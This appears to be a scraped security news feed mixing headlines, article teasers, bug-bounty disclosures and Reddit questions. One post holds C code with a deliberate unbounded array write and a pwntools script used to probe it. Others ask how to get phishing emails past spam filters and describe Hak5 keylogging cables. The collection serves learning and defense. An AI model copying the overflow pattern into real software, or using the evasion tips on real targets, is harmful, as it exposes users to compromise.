    FreeBuf Morning Report | Sichuan and Chongqing publish a list of 16 apps that infringe users' rights; pro-Russian group Killnet attacks European hospitals
    In 2022, hackers stole a record $3.8 billion in the cryptocurrency sector.
    Xiaomi car "design documents" leaked; supplier fined 1 million yuan!
    In accordance with the Confidentiality Agreement, a financial penalty of 1 million yuan was imposed; the supplier was ordered to strengthen information security management of its downstream suppliers and to deal with the person responsible for the leak.
    iOS reverse engineering: restoring dyld's in-memory loading method
    Previously we had been using the in-memory loading of Mach-O bundles provided by dyld and its NSCreateObjectFileImageFromMemory / NSLinkModule API methods.
    More than 1,800 kinds of Android phishing kits sold on the dark web at very low prices
    Credential-harvesting web injects targeting mobile banking and cryptocurrency applications are being sold on the dark web.
    LockBit recruits new members and starts using a Conti-based encryptor
    The new encryptor is called LockBit Green; reverse engineering of samples found it to be 100% based on the leaked Conti source code.
    Observations on enterprise email security posture for Q4 2022
    CNCERT (National Internet Emergency Center) releases the Coremail enterprise email Q4 report: phishing emails reached 66.66 million, up 48.12% quarter over quarter; beware of criminal groups impersonating government departments to send phishing scams themed [talent/labor/pandemic subsidies]!
  • Open

    Secondary development of Cobalt Strike in real-world scenarios
    Author: 雪诺凛冬实验室 gd Original link: https://mp.weixin.qq.com/s/R1BoWivtTxo0zFk4nyBFTw Preface With the HW offense-defense exercises of recent years, nobody is a stranger to Cobalt Strike anymore, and security products have been thinking about how to identify CS's traces on the traffic side and the endpoint side. Besides the habitual plugin-based development for efficiency, attackers also have some adversarial points to address to improve CS's stealth. In two articles we will cover CS at the traffic level and the...
  • Open

    Russians are Starting to Think
    In the west, the practice of open-source intelligence is the norm. While particular weapon systems are seen as almost magical for the war… Continue reading on Medium »

  • Open

    Input Validation Issues
    POV: you log in to a site on a work computer using your credentials; however, after putting yours in, you log in as whoever was last using the computer. What are your thoughts/theories on how this could happen? submitted by /u/EstrogenGirl [link] [comments]
    Google Voice number for higher account security?
    I've been reflecting on the growing number of data breaches, SIM swap attacks, and other factors that have resulted in identity theft. I wanted to run a thought by this subreddit to get opinions on something I'm thinking of doing to provide some of my accounts with a higher level of protection. I have a Google account that has their Advanced Protection Program enabled - two physical security keys as MFA. That account also has an active Google Voice number that I've sat on and done practically nothing with for several years. That GV phone number receives 1 or 2 calls/texts a year and they're always from people who knew the owner of that number some years ago. So, the number is more or less unknown and not out there in any data breaches AFAIK. My idea is to use this Google Voice number for several accounts that don't offer the ability to use a physical security key for MFA. As I understand it, because your GV number is tied to your Google account and therefore can't be accessed by anyone without your credentials and MFA (which in this case would require physical access to both of my physical keys, as well as knowledge of where they are), and it can't be SIM swapped because there's no SIM to swap, this seems like the best, most secure bet for maintaining account security for online accounts that have only SMS 2FA as an option. Any holes that you can poke in the idea? Are there better methods when physical key security isn't available? submitted by /u/Aggravating_Bell3162 [link] [comments]
    Resources to learn Incident Response for someone relatively new to Cybersecurity
    I'm a sophomore computer science major who has an upcoming interview with Meta for a Privacy Engineering role. One of the rounds for the interview is an incident response scenario interview. Here are the instructions: "During this interview we will ask you to run an investigation of a suspicious alert. You will need to determine whether this is an incident or not and demonstrate your understanding of the root cause, mitigation and remediation". What resources could I look into to best prepare for the interview? Would a Security+ textbook be enough to get a good grasp of Incident Response? I'm relatively new to cybersecurity, and any beginner-friendly resources would be greatly appreciated. Thanks. submitted by /u/NoFaithlessness6885 [link] [comments]
    Exabeam Query Language Assistance
    Howdy! Longtime lurker, first time poster. I'm a threat hunter, and I just got assigned a new client that utilizes Exabeam. Do any of y'all have experience with the query language used by Exabeam? I'm somewhat coming up blank even from Exabeam's own documentation. Most of their training videos seem centered around working through AA (Advanced Analytics), but I'm trying to produce actual queries in DL (Data Lake) and not pick through a bunch of screens in AA. Thanks! submitted by /u/cosmic_gr4zer [link] [comments]
    Blue team tips and help ?
    What are some tips and suggestions for a blue team trying to defend against red team attackers in a competition? Realistically we want to keep the uptime as long as possible, but honestly I'd like to know what others suggest to help. submitted by /u/RevPurge [link] [comments]
    PasswordSafe & KeePass database stored on cloud storage (OneDrive,Gdrive,DropBox)
    This is a common method of creating your own free, multiplatform password manager. Simply store the DB on a cloud storage provider and use a manager plus a fork on your phone, since the manager doesn't work on its own. For example: This - https://play.google.com/store/apps/details?id=com.jefftharris.passwdsafe With this - https://play.google.com/store/apps/details?id=com.jefftharris.passwdsafe.sync My question is, is this system considered wise in terms of security? Are these DBs encrypted? submitted by /u/trekinstein [link] [comments]
    Believe we have been hit with someone with CrackMapExec...help?
    Obligatory SIHTF moment here. Have already started the process of what I think is prudent... what would you guys do first? The part that tipped this off was a folder called "ptest" showing up on one user's desktop computer. No other machines in the environment appear to have this folder. The other reason this machine is under the microscope (and currently turned off, although ptest was created Nov 3rd) is because a user walked in to find another user's name on the login screen; it does not appear that the login actually occurred. At the moment it appears the person was trying to get in and either did not have the exact correct password or was interrupted. The specific user that they are trying to target is not very computer literate and had an easy password, something comparable to 'reddog12' - this has been changed on a different computer. Most concerned about access to 2 different servers. Thank you for any suggestions. submitted by /u/Blazah [link] [comments]
    bitwarden vs 1password vs lastpass vs ...
    Hello, I have been trying to get a password manager, but after reading lots of stuff, I'm more confused than before... My use case is simple: store and manage passwords for websites; if a website allows me to use a YubiKey 5C NFC, I will add that as MFA; usage on Windows, macOS, Linux and Android. Should I add the YubiKey to the master password? Which one do you use? What would you recommend? submitted by /u/IP_FiNaR [link] [comments]
    Industry metrics
    Any ideas on where I can find industry numbers for security metrics? For example, training awareness completion, phishing simulation, etc. I'm trying to baseline our goals. submitted by /u/evilmanbot [link] [comments]
    Any tips on efficiently evaluating a huge list of subdomains for a PenTest?
    I've been tinkering around and trying to solidify my recon phase of things. I'm pretty new and have been liking the results from amass, SubDomainizer, and subscraper. I'm sure there are more tools out there, but this will generally give me hundreds, sometimes a thousand or so, subdomains to work with. I plan on making a custom script that will read the files produced by all the different tools to make a master file of subdomains that does not repeat the same one (tools are going to spit out repeats of other tools). Once I have a huge subdomain file list, what's the most efficient way to work the subdomains moving into port reconnaissance? I've used some online tools that allow you to paste subdomains and it'll give you the IP. But I also know that in Kali Linux you can use nslookup to get IPs. I'm thinking about writing a custom script that will run the nslookup command down the master list of subdomains and print it out into a master IP list document neatly one row at a time. I'm assuming the efficiency goal is to do the following: Subdomains > IPs > port scans > vulnerability assessment phase. Does anyone have any tips of the trade or the best tool or method once you have that huge file of unique subdomains? submitted by /u/Speen117 [link] [comments]
  • Open

    Ronin 2.0.0 has finally been released! Ronin is a free and Open Source Ruby toolkit for security research and development.
    submitted by /u/postmodern [link] [comments]
    HeadCrab: A Novel State-of-the-Art Redis Malware in a Global Campaign
    submitted by /u/gfdgfbal [link] [comments]
    Precision Munitions for Denial of Service
    submitted by /u/DevSec23 [link] [comments]
    CVE-2021-34462: Exploiting the Windows AppXSvc Service Logic-Error Vulnerability
    submitted by /u/Gallus [link] [comments]
    RCE in Avaya Aura Device Services
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Protecting your sensitive information on the web: How to understand and prevent Cross-Site Scripting (XSS)
    Cross-Site Scripting (XSS) is one of the most common security vulnerabilities on the web. It is a technique that allows the injection of scripts… Continue reading on Medium »
    Understanding and Preventing CSRF Attack: About CSRF
    A Comprehensive Guide to Identifying, Mitigating and Protecting Your Website from Cross-Site Request Forgery Continue reading on InfoSec Write-ups »
    What is in the Strings.xml!!
    In Android, an application is a package called an APK (Android Package Kit); it is a zip-like format from which the data can be extracted… Continue reading on Medium »
    Techniques to discover subdomains
    Before taking any action on any bug bounty program it is necessary to carefully read the rules of the program. Continue reading on Medium »
    Stored XSS — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)
    # Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — Stored XSS Vulnerability. # Date: 25–01–2023 # Exploit Author: Venkata Siva Kumar… Continue reading on Medium »
    Account Takeover Guide
    Hey guys, in this tutorial, I will be sharing my learning about account takeover which I have learned after reading some blogs only on… Continue reading on InfoSec Write-ups »
    What is Ethereum? Mastering Ethereum for smart contract security
    What is Ethereum Everything you need to know? Continue reading on Medium »
    Don’t Give Up On XSS! | Fun Firefox XSS
    There’s always a way to exploit xss in different contexts Continue reading on InfoSec Write-ups »
    Privilege Escalation Lead to Data Breach
    Peace be upon you, Bug Hunter! How are you? Hopefully all is well. This time I want to write a write-up about a bug that, in my opinion… Continue reading on Medium »
    OSINT analysis — SpiderFoot & theharvester (Information Gathering)
    What is OSINT? Continue reading on Medium »
  • Open

    Enhancing OSINT Collection using RSS Feeds
    RSS (Really Simple Syndication) is a technology that allows users to subscribe to frequently updated content on the internet, such as blog… Continue reading on Medium »
    Hacktoria — Operation Manhunt
    I joined late, on 5th or 6th January when all of the tweets had already been posted. Players were asked to identify country, city, street… Continue reading on Medium »
    Are you looking for information about a person, company, or organization?
    I am here to help you uncover hidden information using advanced Open-Source Intelligence (OSINT) techniques. Continue reading on Medium »
    OPERATION: MANHUNT WRITEUP
    January 1, 2023 Continue reading on The Sleuth Sheet »
    SPYrt speakers…
    Smart speakers have learned to listen to suspicious noise in the house, however, not all users were happy with the new option, writes… Continue reading on Medium »
  • Open

    Exploring FTP Vulnerabilities through Hands-On Testing in a Virtual Lab Environment
    File Transfer Protocol (FTP) and its security implications. This post offers an in-depth look at the usage of FTP for file transfers Continue reading on InfoSec Write-ups »
    Detecting & Bypassing Defensive Measures (Canary Token)
    In the last part, we talk about how to track the hacker’s activities on our network using a canary token. Continue reading on System Weakness »
    Detecting & Bypassing Defensive Measures (Canary Token)
    In the last part, we talk about how to track the hacker’s activities on our network using a canary token. Continue reading on Medium »
    Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) — [CWE-22]
    Continue reading on Medium »
  • Open

    Absolute massive open directory with celebrity pictures
    submitted by /u/degamezolder [link] [comments]
  • Open

    Another Password Manager Leak Bug: But KeePass Denies CVE
    Article URL: https://jpayne.sackheads.blog/2023/01/31/another-password-manager.html Comments URL: https://news.ycombinator.com/item?id=34614678 Points: 1 # Comments: 0
  • Open

    SecWiki News 2023-02-01 Review
    A nine-stage space attack research and tactical analysis framework and the seven-layer US defense space architecture by ourren; 2022 annual APT advanced threat report by ourren. For more of the latest articles, visit SecWiki
  • Open

    SecWiki News 2023-02-01 Review
    A nine-stage space attack research and tactical analysis framework and the seven-layer US defense space architecture by ourren; 2022 annual APT advanced threat report by ourren. For more of the latest articles, visit SecWiki
  • Open

    The cybersecurity customers I have known
    Over the years I have dealt with all kinds of cybersecurity customers, and some of it is quite interesting to recall.
    Decrypting the CryptBot infostealer
    CryptBot is information-stealing malware targeting the Windows operating system, first discovered in 2019, designed to steal sensitive information from compromised hosts.
    2022 Global Email Threat Report - 网际思安 (MailSec)
    We have newly compiled the data analysis results of 网际思安 MailSec Lab in the field of email security threats for 2022, along with the global cutting-edge information and data we observed.
    SCA Technology Advanced Series (1): A first look at SBOM application practice
    As an important lever for software supply chain security governance, SBOM adoption in the industry is clearly accelerating.
    In-depth | Analysis report on the file-infecting ransomware Azov
    The Azov ransomware family first appeared in mid-October 2022 and is a file-infecting ransomware.
    FreeBuf Morning Report | Musk pressured to comply with the EU's new digital rules; TikTok CEO to attend a US congressional hearing
    TikTok CEO Shou Zi Chew has agreed to attend a hearing in the US Congress, scheduled for March 23.
    Automotive CAN bus penetration testing
    The CAN network is not a closed internal network: it can be accessed directly through the vehicle's OBD diagnostic port, or indirectly by connecting to the T-Box via a smartphone, cloud server and so on, which gives attackers an opportunity to intrude into the CAN network.
    A glimpse of IoT supply chain threats through attacks on Realtek SDK vulnerabilities
    The in-the-wild exploitation of CVE-2021-35394 shows that attackers are very interested in supply chain vulnerabilities, and supply chain security in IoT deserves even more attention.
    CCSIP 2022 China Cyber Security Industry Panorama (5th edition) officially released
    FreeBuf Consulting officially releases the CCSIP (China Cyber Security Industry Panorama) 2022 China Cyber Security Industry Panorama (5th edition).
    Format string vulnerability analysis
    An analysis of the process of exploiting format string vulnerabilities.
    Change your password now: KeePass has a serious vulnerability, password database exported in plaintext
    KeePass officially stated that CVE-2023-24055 should not be blamed on KeePass and that it is not something KeePass can fix.
    A machine-learning-based anomaly detection method for the automotive CAN bus
    Machine learning, a crucial technology in in-vehicle network intrusion detection, can identify and detect the features of known and unknown attack behaviors.
    Google Fi breached, major leak of customer data
    Google Fi says customer data was leaked by hackers; the incident is likely related to the large-scale T-Mobile hack that occurred on January 19.
    Microsoft: more than 100 attackers have used over 50 ransomware families
    Microsoft's security team has tracked more than 100 attackers who deploy ransomware during attacks and has monitored more than 50 ransomware families in frequent use.
    Setting up a DVWA platform + detailed SQL injection lab
    Set up the DVWA platform and practice SQL injection to understand the harm caused when a web application fails to validate, or insufficiently filters, the legitimacy of user input.
    A first look at the NTLM protocol
    The NTLM protocol has two versions, NTLM v1 and NTLM v2, but NTLM v2 is by far the most widely used today.
  • Open

    How Threat Actors Use OneNote to Deploy ASyncRAT
    See how Research Team Lead Carlos Perez dissects a sample of a OneNote document that was used to deploy ASyncRAT, an open-source remote admin tool, to enable phishing attacks. You’ll find out how these OneNote files are now being used by threat actors and where to find the location that ASyncRAT is being downloaded and... The post How Threat Actors Use OneNote to Deploy ASyncRAT appeared first on TrustedSec.
  • Open

    EnCase Report show Hex value
    I bookmarked a hex value but the text is showing in the Report. The text isn't the helpful part; is there a way to show the Hex value instead? Also, I vaguely recall years ago being able to show the "Report" section in the report. You know the report tab when viewing a file; I remember being able to select that as an option to show. I can't seem to find it anymore. Is that no longer possible? submitted by /u/dardack [link] [comments]
  • Open

    Account Takeover Guide
    No content preview
    The Importance of Backing Up Your Data for ICS Security
    No content preview
    All About Attacking JWT
    No content preview
    Phishing Scams Exposed: The Tricks Hackers Use and How to Defend Yourself
    A Comprehensive Guide to Understanding and Defending Against Phishing Scams Continue reading on InfoSec Write-ups »
    The Impact of Artificial Intelligence on Exploit Development
    No content preview
    Increasing Website Security
    I will be going over things you can add to your company's code base to increase the security of your app. Continue reading on InfoSec Write-ups »
    Don’t Give Up On XSS! | Fun Firefox XSS
    No content preview
    GOOGLE CHROME’S BIGGEST BLUNDER:
    No content preview
    Online Income Generation: Balancing Opportunities and Risks in Cybersecurity
    Maximizing Earnings While Protecting Your Online Safety: A Guide to Online Income Generation and Cybersecurity Continue reading on InfoSec Write-ups »
    “Zero-Day Exploits: The Dark Side of Technology to your business”
    No content preview
  • Open

    Bypass Windows Defender,
    Researchers at S2W used the Jackalope fuzzer to exploit CVE-2022-24548 in Windows Defender and bypass its security controls. Continue reading on Medium »
  • Open

    Analysis of the Windows Backup Service local privilege escalation vulnerability (CVE-2023-21752)
    Author: zoemurmure Original link: https://www.zoemurmure.top/posts/cve_2023_21752_1/ 0. Preface CVE-2023-21752 is Microsoft's first vulnerability of 2023 with a public exploit. I originally thought that having exploit code would make it easy to analyze, but it ended up taking a long time. The two main difficulties were locating the vulnerable code and analyzing the exploit code, so this article devotes more space to those two parts. Feedback welcome...
  • Open

    Dalbit (m00nlight): A Chinese hacker group's APT attack campaign - ASEC BLOG
    submitted by /u/dmchell [link] [comments]
    Phishing Tips?
    Hey all, I have an upcoming physical/phishing engagement. Unfortunately I was tasked on very short notice to develop a phishing campaign with custom domains. My boss is VERY adamant that this remains hush-hush, so no whitelisting. (We are a PE firm testing some portfolio companies.) So far I have the domains bought; SPF, DKIM, and DMARC have been configured. I've tested my email configuration against mail tester and it's 10/10. I have tried various combinations of O365 and SMTP APIs, but everything I have tried ends up hitting the spam filter. Do you all have any recommendations on how to build IP/domain reputation fast? Have any of you had success with an inbox warmer? I realize that this might not be possible on such short notice (<2 weeks away). I appreciate any tips/feedback. submitted by /u/KungFuBatman [link] [comments]
  • Open

    Self-XSS due to image URL can be exploited via XSSJacking techniques in review email
    Judge.me disclosed a bug submitted by penguinshelp: https://hackerone.com/reports/1397940 - Bounty: $500
    HTML INJECTION (STORED)
    Judge.me disclosed a bug submitted by criptex: https://hackerone.com/reports/1252155
    Improper Access Control in Ali Express Importer
    Judge.me disclosed a bug submitted by penguinshelp: https://hackerone.com/reports/1609955 - Bounty: $500
    Stored XSS in Public Profile Reviews
    Judge.me disclosed a bug submitted by vj1naruto: https://hackerone.com/reports/1398285 - Bounty: $250

  • Open

    An IDOR vulnerability often hides many others
    Some errors are occasional, others result from poor design, in this case, finding a vulnerability allows you to find many others… Continue reading on InfoSec Write-ups »
    A bug that permitted bypassing of Facebook’s two-factor authentication (2FA) was discovered by a…
    A flaw in a new, centralized system that Meta developed for users to manage their Facebook and Instagram logins could have made it… Continue reading on Medium »
    My First Hall Of Fame with Web Cache Poisoning
    Web Cache Poisoning — An Introduction | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Broken Function Level Authorization leads to disclosing PII Information of all company users
    In the name of God, the Most Gracious, the Most Merciful Continue reading on Medium »
    Hacking Blind
    Sometimes, an attacker sends payloads to hack a system but nothing is returned by the application, which can confirm that the application… Continue reading on Medium »
    Tokopedia HTML Injection
    Hello friends, let me introduce myself: my name is Mohammad Alfin Hidayatullah. I want to share a write-up about a bug I found on… Continue reading on Medium »
    Arbitrary file read tricks with headless browsers
    How to tackle some obstacles when hacking headless browsers to maximize the value of arbitrary file read vulnerabilities. Continue reading on Medium »
    Vulnerability Assessment vs Penetration Testing vs Red Team
    Cyber security is becoming increasingly important as the number of cyber attacks continues to rise. To stay ahead of the threat… Continue reading on Medium »
    Authentication bypass via encryption oracle
    This is practice lab presented by portswigger web security team. So this is under flow control vulnerability present in web application. Continue reading on Medium »
    Discovering Domains Like Never Before : Moniorg
    Introduction Continue reading on Medium »
  • Open

    Setting you up for failure: Exploring 2FA bypasses in web application settings page functionality
    I discuss an interesting attack vector which not many people do to possibly bypass 2 factor authentication in a web application. submitted by /u/TheCrazyAcademic [link] [comments]
    TimeException: A tool to find folders excluded from AV real-time scanning using a time oracle
    submitted by /u/sanitybit [link] [comments]
    Remote Command Execution in binwalk
    submitted by /u/Gallus [link] [comments]
    Learning CodeQL - Going Beyond Grep
    submitted by /u/Gallus [link] [comments]
    Github reports unauthorized access to some Github Desktop and Atom repositories
    submitted by /u/qwerty0x41 [link] [comments]
    The Good, Bad and Compromisable Aspects of Linux eBPF
    submitted by /u/eberkut [link] [comments]
    VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive and Exploit POC
    submitted by /u/scopedsecurity [link] [comments]
    Exposing Secrets Via AppSec Tools: The SonarQube Case
    submitted by /u/roy_6472 [link] [comments]
    How to identify and avoid malicious code in your software supply chain
    submitted by /u/n0llbyte [link] [comments]
    Lockpicking The Lockout Policy For Information Correlation: Exploring the novel web app attack…
    Discussing an underrated sub bug class of Business Logic Flaws in web apps that deserves more attention. submitted by /u/TheCrazyAcademic [link] [comments]
    CloudGPT - Use ChatGPT to analyze AWS policies for vulnerabilities
    submitted by /u/ustayready [link] [comments]
  • Open

    Lots of books in Romanian, French, German, English and Italian, from 1829 to 1945
    submitted by /u/Thocomerius [link] [comments]
    Music from some Amiga games
    http://amigamuseum.emu-france.info/Fichiers/mp3/ http://worldofmenchi.fr/Amiga/Musics/ https://www.amigahellas.gr/downloads/music/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Red Teams (Exploitation)
    The exploitation phase in a Red Team is the phase in which the vulnerabilities identified in the reconnaissance phase are taken advantage of… Continue reading on Medium »
    The Penetration Testing, Red Teaming, Vulnerability Assessments Debate: Which one is right for your…
    As businesses become increasingly reliant on technology, the need for robust security measures has become more important than ever. With… Continue reading on Medium »
    Vulnerability Assessment vs Penetration Testing vs Red Team
    Cyber security is becoming increasingly important as the number of cyber attacks continues to rise. To stay ahead of the threat… Continue reading on Medium »
    Discovering Domains Like Never Before : Moniorg
    Introduction Continue reading on Medium »

    Stored XSS in SVG file as data: url
    Shopify disclosed a bug submitted by irisrumtub: https://hackerone.com/reports/1276742 - Bounty: $5300

    Any Application Security Engineer certs recommendation?
    I'm currently in the role of an Application Security Engineer in a Brazilian company, and my knowledge is becoming stagnant due to a lack of challenging tasks (which I hate). Do you guys have any certification recommendations that could be a challenge and also help boost my career/job profile? I've got a background in pen-testing and offensive security in general but have lost some interest in it as I don't really like the job opportunities associated. I've read a lot on OSCP and other Offensive Security certifications, but they all seem very offensive, whereas I'd like to focus more on the defensive side. (Vulnerability Management, how to implement SAST/DAST, when should a bug-bounty program be introduced? how would you rank the company's security maturity? Something along those lines) submitted by /u/Krlier [link] [comments]
    Hit me with your best recs relating to Security Architecture
    What communities are you a part of? Subreddits, associations, or other organizations to collaborate. submitted by /u/PussyFriedNachos [link] [comments]
    Paying for GREM out of pocket?
    Hi all, Hoping to get some advice. I would like to switch positions and work in a malware analyst or reverse-engineering role and was wondering if getting the GREM certification would be helpful in landing a job. I previously worked as a security consultant, red team member, tech writer, and, most recently, as product owner for an identity provider startup. I've come to dread working as a manager and get stressed and depressed every time I see myself being added to another meeting, so I think some kind of change is necessary. Most of my technical work experience has been security-focused, though not on malware: more using tools such as Burp Suite, Cobalt Strike, Nessus, IBM AppScan, and other VA/pentesting tools. And writing reports. Lots of reports. I have some personal RE experience - I used to be active on some forums and progressed to recovering the RC4 keys of Zeus variants and things like that, though my skills might be a bit rusty. I know enough x86/ia64 assembly to not be totally lost when using Binary Ninja, Ghidra, or IDA. I don't know if malware analyst/RE positions have hiring challenges similar to other netsec positions and I am not 100% sure what to expect. This leads me to ask - is getting the GREM cert worthwhile for landing a job? I would be paying for it out of pocket. I haven't decided whether or not I'd pay for the course or just try and pass the cert on my own. I don't have much experience with malicious macros, but I have dabbled in VBA a bit in the past. I do not have a college degree and cannot see myself finishing one at this point. I burned through 10 years of my GI Bill switching majors instead of just finishing something. So far the lack of a degree hasn't hurt me too much. Sorry for the long post - but if anyone has any insight, or can share their personal experience with a similar situation, it would be greatly appreciated. Thanks! submitted by /u/tohitsugu [link] [comments]
    Using non-ssd drives to securely delete data
    Since there is no definitive way to safely delete/purge a file from an SSD, I was thinking of replacing the disk with a traditional mechanical one and using shredding software to securely delete data with well-known overwriting algorithms. Do you think it is a good approach? Thanks submitted by /u/AnotherRedditUsr [link] [comments]
    What even are ports?
    Is it a piece of code, a program? If it is, who wrote it? I just want to know more deeply what is behind the hood, but the sources I found either generalize it too much or dive so deep I don't see it yet. For example, say port 80 and port 443: how does the computer even begin to open it, who wrote it, where is it located in memory, can you even change or modify it? I know it's a super basic and stupid question. Thanks in advance submitted by /u/tramquangpho [link] [comments]

    SecWiki News 2023-01-31 Review
    No news updates today~ For more of the latest articles, visit SecWiki

    Autopsy max number of file events Timeline
    How can I output, within Autopsy via the Timeline tab, on which date the maximum number of file events happened? Thanks. submitted by /u/Failnaught223 [link] [comments]

    Machine Learning Versus Memory Resident Evil
    Malware detection accuracy through memory detection and other tools highlights how to counter increasingly evasive malware types. The post Machine Learning Versus Memory Resident Evil appeared first on Unit 42.

    New Attacks, Old Tricks: How OneNote Malware is Evolving
    Analysis of OneNote Malware. A lot of information has been circulating regarding the distribution of malware through OneNote, so I thought it would be fun to look at a sample. It turns out there are a lot of similarities between embedding malicious code into a OneNote document and the old macro/VBA techniques for Office... The post New Attacks, Old Tricks: How OneNote Malware is Evolving appeared first on TrustedSec.

    FreeBuf Morning Report | GitHub code-signing certificates stolen; pro-Russian group Killnet attacks US healthcare websites
    GitHub disclosed that an unknown intruder gained unauthorized access to some of its code repositories and stole the code-signing certificates for its Desktop application and Atom.
    "2022 Annual Blockchain Security and Anti-Money-Laundering Analysis" released: vulnerability exploitation is the most common attack method
    There were 303 security incidents in 2022, with losses as high as US$3.777 billion, down about 61% from US$9.795 billion in 2021.
    The road to security protection: Suricata deployment and testing
    Suricata is a network traffic identification tool that inspects and processes network traffic using community-created and user-defined signature sets (rules).
    Major news! JD Sports leaks information on 10 million users
    JD Sports recently disclosed a cyberattack involving the data of 10 million customers, whose personal and financial information may have been accessed by the attackers.
    US "No Fly List" shared on a hacker forum
    The list contains records of more than 1.5 million people banned from flying and more than 250,000 "selectees".
    How much can you earn working for hackers? Monthly salaries of up to US$20,000
    Kaspersky analyzed more than 200,000 job advertisements posted on the dark web to assess overall pay in the cybercrime industry.
    Investment of no less than 7%! The Securities Association of China publishes a three-year cybersecurity improvement plan
    The "Three-Year Improvement Plan" has 5 chapters and 20 articles, sets out 33 key tasks, and gives directions and requirements in six areas.

    OSINT Maltego
    Maltego is a very useful OSINT tool. Continue reading on Medium »

    Clever uses of iptables for packet capture on Android
    Author: evilpan. Original link: https://evilpan.com/2023/01/30/android-iptables/ This article introduces a single-app, global, and elegant way to capture packets on Android. It was written during last year's Dragon Boat Festival and, for various reasons, was not published at the time. It is now shared with some sensitive information removed, in the hope that it inspires readers. Background: While testing an Android APK yesterday, I found that when using WiFi the HT...
    Fuzzing the Boa framework from scratch
    Author: 崎山松形. This article is a contribution from the author; Seebug Paper looks forward to your submissions, and every accepted article receives a gift! Submission email: paper@seebug.org Preface: Recently, while working on IoT, I came across the Qiling framework. After using it for a while, I found its emulation capabilities really strong, and it also supports fuzzing, so I started learning how to fuzz programs such as IoT web servers. The official project provides similar examples, such as a fuzzing script for the httpd of the Tenda AC15, but also...

    Electrify America bug opens hacking vulnerability concerns
    Article URL: https://www.teslarati.com/electrify-america-chargers-hacking-vulnerability-bug/ Comments URL: https://news.ycombinator.com/item?id=34590230 Points: 2 # Comments: 0

    Soft Skills: Writing
    Writing.  Like math in middle school, this is one of those subjects that we pushed back on, telling ourselves, "I'll never have to use this...", and then quite shockingly finding that it's amazing how much writing we actually do. However, are we doing it well, given the particular circumstances of the writing? We "write" on social media, not being too overly concerned about things like grammar, spelling, or even word choice, falling back on the old, "...you know what I meant...", or blaming auto-correct for the miscommunication. I'll be the first to admit, I'm not an "expert" at writing, nor am I "the best". But I will say that I am intentional in my writing, and this is something that's led me to...not been the result of...maintaining a blog, and publishing several books, with others in …

    Question regarding GDB/GEF and pwntools to find buffer overflow
    I am trying to identify the offset at which a buffer overflow occurs via pwntools and gdb, via submission of integers through scanf. Here is the C code (x64):

        int input[8];
        int count, num;
        count = 0;
        while (1) {
            printf("Enter:\n");
            scanf("%d", &num);
            if (num == -1) {
                break;
            } else {
                input[count++] = num;  /* no bounds check: the 9th value writes past input[] */
            }
        }

    Understanding that the size of the integer is 4 bytes, I am attempting to feed the program a string of integers via pwntools (code below):

        from pwn import *
        context.log_level = "debug"
        io = gdb.debug('_file_')
        for i in range(0, 10, 1):
            io.clean()
            io.sendline("{:d}".format(i).encode())  # pwntools tubes expect bytes
        io.interactive()

    However, I am having trouble finding the offset and trying to debug the program via gdb. I would like to be able to see changes to the stack as each integer is input (via ni or si). Is there a better way to identify where the program crashes? I am using the for loop as a proxy for pattern create (with the hope of seeing which integer causes the crash). Any insights would be greatly appreciated! submitted by /u/tbenson80 [link] [comments]


    KeePass disputes vulnerability allowing stealthy password theft
    Article URL: https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/ Comments URL: https://news.ycombinator.com/item?id=34587387 Points: 17 # Comments: 1

    I need advice on choosing what's best for my career
    First off, I just want to say that I'm very blessed to be in the current position that I'm in now. I realize that the market is tough right now and that I'm very fortunate to be having the opportunities that I have right now, especially as I am leaving college. I hope that my post doesn't come off in any way as bragging/ungrateful or anything like that. I just simply want more opinions on what I should do. So I have two internship offers for my final summer in University. The first one is for Crowdstrike and it is as an analyst for their Falcon Complete product. The second one is for IBM and it is for their penetration testing team. In terms of my career I really would like to go down the red team route, but I fear that I may be missing out on a big opportunity by not working with Crowdstrike. It seems like a lot of people have positive things to say about them and they are a pretty big name in the industry. I think I remember one redditor saying that they would work for them for free if they had the chance or something. But I have a slight/moderate dissatisfaction towards the role; I did forensics at another internship last summer and I can't really see myself doing that for years. It's a cool field, but I just don't think it's for me. There is also the prospect of layoffs. Apparently there are supposed to be more layoffs around the time I'm supposed to start, so I fear that my offer may be pulled from one or the other. A couple of people in my life have told me to accept both offers, but then just renege on one of them like a week before the start dates, but doing this will for sure burn bridges and I believe that is pretty unwise, especially this early in my career. Any advice on how I should approach this situation? submitted by /u/No_Actuator_6713 [link] [comments]
    Groomed for a Firewall position
    Hey all, I'm looking to see if there is anywhere I can get my hands dirty on Cisco or Palo Alto firewalls. My experience on these is limited, but I am being nudged by a colleague towards a possible job opening in lieu of these requirements. If anyone can point me in the right direction that would be phenomenal. I currently work in cyber but as an ISSO and I need something more technical before I bash my head against my monitor. If I have to buy hardware off of eBay, I will ASAP. submitted by /u/zeropyther [link] [comments]
    Hak5 / charging cable question
    Hi guys! I am a newbie and came across a technology, USB ports and charging cables from Hak5. Apparently you stick them into phones to charge and they look like regular USB-C cables from Apple, or USB sticks that go into computer ports, and they do things like keylogging and whatever. The site says they do things like keystroke injection (DuckyScript), mouse injection, payload slots, self destruct, geofencing, Wi-Fi trigger, full-speed USB hardware keylogger, covert data exfil, and networked C2. Idk what any of this means, I'm just transcribing. Anyway, does this mean that if you plug one of these into your iPhone or computer they download viruses and keyloggers forever and your device has it like herpes, or is it only when it's plugged in that it can read and see what's going on, and why hasn't Apple done anything about this? The same question applies to USB drives. And how can I counteract this? I heard you can disable the USB drive on your computer at least so it just doesn't recognize the USB. Thanks! submitted by /u/Normal-Question-1994 [link] [comments]
    Is it safe to open the SSH port with a password?
    Hi, I'm using Manjaro on a little server and I would like to use ssh/sftp from outside my LAN. To achieve this I open the SSH port, redirect it to a non-standard port on the router, and set up a KeePass-generated strong password. Is this secure enough? Thanks! submitted by /u/RuedaRueda [link] [comments]
    Training materials for understanding infra? (containers, Kubernetes, Docker)
    Hey guys, I'm currently a jr app sec engineer mainly helping in secure code development and running SAST/DAST tools. I'm currently studying for AWS Security cert, but my understanding of infra is very weak. Does anyone know where they can point me in the right direction here? submitted by /u/herbertisthefuture [link] [comments]

    Lots of wares
    submitted by /u/ra6907 [link] [comments]
